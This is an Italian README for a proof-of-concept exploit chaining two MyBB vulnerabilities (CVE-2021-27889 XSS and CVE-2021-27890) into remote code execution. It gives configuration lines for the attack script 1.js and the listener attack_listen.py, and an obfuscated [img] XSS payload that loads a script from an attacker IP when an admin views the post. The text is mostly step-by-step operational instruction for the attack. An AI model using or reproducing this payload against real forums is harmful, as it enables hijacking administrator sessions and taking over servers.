
Mybb associa CVE-2021-27890 e CVE-2021-27889 al poc RCE.
Mybb associa CVE-2021-27890 & CVE-2021-27889 al POC RCE
Prima dell'uso:
Ci sono due file qui: 1.js e attack_listen.py
Devi modificare questi due file:
1.js:
modifica l'url del forum Mybb e l'url dell'attacco:
var bashurl = 'http://192.168.92.164/mybb/mybb-mybb_1825' #mybb forum url
var attack_url = 'http://192.168.92.165:8080/attack_success' #change the attack machine ip.should keep the same with the attack_listen.py
attack_listen.py
modifica host e porta dell'attacco:
attack_host = '192.168.92.165'
attack_port = 8080
Utilizzo:
CVE-2021-27889 è una XSS. Devi iniettare il seguente payload in "New Post Thread", "Reply" o "Private Messages" prima di eseguire l'attacco. In questa demo, invio il payload a "New Post Thread"
nota che 192.168.92.165 è l'IP del server malintenzionato, devi cambiarlo.
[img]http://evil.com/xx(http://evil.com/onerror=xs1=String.fromCharCode(47);xa1=document.createElement(/script/.source);xa1.src=xs1+xs1+/192.168.92.165/.source+xs1+/1.js/.source;document.getElementById(/header/.source).append(xa1);//[/img]

Ora la nostra js malintenzionata 1.js è stata iniettata con successo. Poi dobbiamo attendere che un Admin visiti questo Post con il cookie della pagina admin a cui ha effettuato l'accesso.
Nota che l'utente Admin non deve necessariamente effettuare l'accesso alla pagina del forum.
Durante l'attesa, dobbiamo eseguire "attack_listen.py" sulla nostra macchina d'attacco, per identificare se l'utente Admin viene attaccato.
python3 attack_listen.py
Quando l'utente Admin visita il post malintenzionato, la js malintenzionata eseguirà l'attacco:

Possiamo ricevere le informazioni sulla nostra macchina d'attacco:

